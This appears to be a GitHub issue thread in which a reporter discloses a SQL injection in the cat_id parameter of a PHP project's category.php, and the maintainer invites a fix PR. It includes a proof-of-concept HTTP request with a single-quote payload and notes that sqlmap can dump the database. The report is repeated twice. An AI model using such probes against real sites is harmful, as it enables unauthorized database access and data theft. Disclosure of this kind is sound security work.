Hello, I found that there is a sql injection vulnerability in the cat_id parameter of the category.php file on the website. Entering single quotes in this parameter will cause the webpage to burst and the database statement to burst. And this parameter can be used by sqlmap to obtain data information in the database.
POC:
GET /category.php?cat_id=1%27 HTTP/1.1
Host: victor.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ia9ksoo6lq6dticsuoddv0gh20
Connection: close
The text was updated successfully, but these errors were encountered:
Hello @ztxyzwd, This is a project I worked on a few years back while learning PHP, so it's prone to have a lot of bugs, regardless of that if there is a fix or rather a PR that fix those issues, I would be glad to merge it.
Hello, I found that there is a sql injection vulnerability in the cat_id parameter of the category.php file on the website. Entering single quotes in this parameter will cause the webpage to burst and the database statement to burst. And this parameter can be used by sqlmap to obtain data information in the database.



POC:
GET /category.php?cat_id=1%27 HTTP/1.1
Host: victor.com
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=ia9ksoo6lq6dticsuoddv0gh20
Connection: close
The text was updated successfully, but these errors were encountered: